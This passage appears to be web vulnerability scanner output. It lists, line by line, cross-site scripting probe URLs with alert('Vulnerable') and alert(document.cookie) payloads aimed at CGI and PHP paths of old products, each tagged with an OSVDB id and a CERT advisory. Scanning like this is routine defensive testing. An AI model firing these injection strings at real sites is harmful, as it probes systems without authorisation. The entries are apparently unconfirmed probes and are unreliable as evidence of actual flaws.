851+ OSVDB-2748: /index.1.html/cgi-914/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
852+ OSVDB-2748: /index.1.html/cgi-915/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
853+ OSVDB-2748: /index.1.html/bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
854+ OSVDB-2748: /index.1.html/cgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
855+ OSVDB-2748: /index.1.html/mpcgi/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
856+ OSVDB-2748: /index.1.html/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
857+ OSVDB-2748: /index.1.html/ows-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
858+ OSVDB-2748: /index.1.html/cgi-sys/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
859+ OSVDB-2748: /index.1.html/cgi-local/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
860+ OSVDB-2748: /index.1.html/htbin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
861+ OSVDB-2748: /index.1.html/cgibin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
862+ OSVDB-2748: /index.1.html/cgis/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
863+ OSVDB-2748: /index.1.html/scripts/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
864+ OSVDB-2748: /index.1.html/cgi-win/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
865+ OSVDB-2748: /index.1.html/fcgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
866+ OSVDB-2748: /index.1.html/cgi-exe/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
867+ OSVDB-2748: /index.1.html/cgi-home/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
868+ OSVDB-2748: /index.1.html/cgi-perl/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
869+ OSVDB-2748: /index.1.html/scgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
870+ OSVDB-2748: /index.1.html/cgi-bin-sdb/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
871+ OSVDB-2748: /index.1.html/cgi-mod/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>: CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. http://www.cert.org/advisories/CA-2000-02.html.
872+ OSVDB-651: /index.1.html/cgi.cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
873+ OSVDB-651: /index.1.html/webcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
874+ OSVDB-651: /index.1.html/cgi-914/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
875+ OSVDB-651: /index.1.html/cgi-915/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
876+ OSVDB-651: /index.1.html/bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
877+ OSVDB-651: /index.1.html/cgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
878+ OSVDB-651: /index.1.html/mpcgi/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
879+ OSVDB-651: /index.1.html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
880+ OSVDB-651: /index.1.html/ows-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
881+ OSVDB-651: /index.1.html/cgi-sys/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
882+ OSVDB-651: /index.1.html/cgi-local/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
883+ OSVDB-651: /index.1.html/htbin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
884+ OSVDB-651: /index.1.html/cgibin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
885+ OSVDB-651: /index.1.html/cgis/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
886+ OSVDB-651: /index.1.html/scripts/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
887+ OSVDB-651: /index.1.html/cgi-win/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
888+ OSVDB-651: /index.1.html/fcgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
889+ OSVDB-651: /index.1.html/cgi-exe/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
890+ OSVDB-651: /index.1.html/cgi-home/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
891+ OSVDB-651: /index.1.html/cgi-perl/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
892+ OSVDB-651: /index.1.html/scgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
893+ OSVDB-651: /index.1.html/cgi-bin-sdb/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
894+ OSVDB-651: /index.1.html/cgi-mod/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
895+ OSVDB-5031: /index.1.html/cgi.cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
896+ OSVDB-5031: /index.1.html/webcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
897+ OSVDB-5031: /index.1.html/cgi-914/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
898+ OSVDB-5031: /index.1.html/cgi-915/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
899+ OSVDB-5031: /index.1.html/bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
900+ OSVDB-5031: /index.1.html/cgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
901+ OSVDB-5031: /index.1.html/mpcgi/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
902+ OSVDB-5031: /index.1.html/cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
903+ OSVDB-5031: /index.1.html/ows-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
904+ OSVDB-5031: /index.1.html/cgi-sys/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
905+ OSVDB-5031: /index.1.html/cgi-local/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
906+ OSVDB-5031: /index.1.html/htbin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
907+ OSVDB-5031: /index.1.html/cgibin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
908+ OSVDB-5031: /index.1.html/cgis/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
909+ OSVDB-5031: /index.1.html/scripts/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
910+ OSVDB-5031: /index.1.html/cgi-win/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
911+ OSVDB-5031: /index.1.html/fcgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
912+ OSVDB-5031: /index.1.html/cgi-exe/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
913+ OSVDB-5031: /index.1.html/cgi-home/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
914+ OSVDB-5031: /index.1.html/cgi-perl/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
915+ OSVDB-5031: /index.1.html/scgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
916+ OSVDB-5031: /index.1.html/cgi-bin-sdb/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
917+ OSVDB-5031: /index.1.html/cgi-mod/betsie/parserl.pl/<script>alert('Vulnerable')</script>;: BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
918+ OSVDB-9283: /index.1.html/cgi.cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
919+ OSVDB-9283: /index.1.html/webcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
920+ OSVDB-9283: /index.1.html/cgi-914/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
921+ OSVDB-9283: /index.1.html/cgi-915/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
922+ OSVDB-9283: /index.1.html/bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
923+ OSVDB-9283: /index.1.html/cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
924+ OSVDB-9283: /index.1.html/mpcgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
925+ OSVDB-9283: /index.1.html/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
926+ OSVDB-9283: /index.1.html/ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
927+ OSVDB-9283: /index.1.html/cgi-sys/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
928+ OSVDB-9283: /index.1.html/cgi-local/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
929+ OSVDB-9283: /index.1.html/htbin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
930+ OSVDB-9283: /index.1.html/cgibin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
931+ OSVDB-9283: /index.1.html/cgis/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
932+ OSVDB-9283: /index.1.html/scripts/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
933+ OSVDB-9283: /index.1.html/cgi-win/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
934+ OSVDB-9283: /index.1.html/fcgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
935+ OSVDB-9283: /index.1.html/cgi-exe/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
936+ OSVDB-9283: /index.1.html/cgi-home/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
937+ OSVDB-9283: /index.1.html/cgi-perl/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
938+ OSVDB-9283: /index.1.html/scgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
939+ OSVDB-9283: /index.1.html/cgi-bin-sdb/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
940+ OSVDB-9283: /index.1.html/cgi-mod/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>: Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
941+ /index.1.html/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
942+ /index.1.html/~/<script>alert('Vulnerable')</script>.aspx: Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
943+ /index.1.html/~/<script>alert('Vulnerable')</script>.asp: Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.cert.org/advisories/CA-2000-02.html
944+ OSVDB-41361: /index.1.html/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
945+ OSVDB-9238: /index.1.html/supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
946+ OSVDB-9238: /index.1.html/supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
947+ OSVDB-9238: /index.1.html/supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
948+ /index.1.html/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
949+ OSVDB-2689: /index.1.html/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html.
950+ /index.1.html/samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
951+ /index.1.html/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
952+ /index.1.html/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
953+ /index.1.html/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
954+ /index.1.html/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
955+ OSVDB-2193: /index.1.html/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
956+ OSVDB-4297: /index.1.html/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
957+ OSVDB-11145: /index.1.html/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
958+ OSVDB-11144: /index.1.html/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
959+ /index.1.html/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to the latest version.
960+ /index.1.html/node/view/666\"><script>alert(document.domain)</script>: Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
961+ OSVDB-5106: /index.1.html/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
962+ /index.1.html/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
963+ /index.1.html/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
964+ /index.1.html/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
965+ /index.1.html/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
966+ OSVDB-50539: /index.1.html/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
967+ /index.1.html/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
968+ /index.1.html/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
969+ /index.1.html/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
970+ /index.1.html/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
971+ OSVDB-3201: /index.1.html/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
972+ /index.1.html/mailman/listinfo/<script>alert('Vulnerable')</script>: Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. http://www.cert.org/advisories/CA-2000-02.html.
973+ OSVDB-5803: /index.1.html/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server default script is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
974+ OSVDB-50552: /index.1.html/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
975+ /index.1.html/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
976+ /index.1.html/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
977+ OSVDB-50553: /index.1.html/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
978+ OSVDB-50553: /index.1.html/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
979+ /index.1.html/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
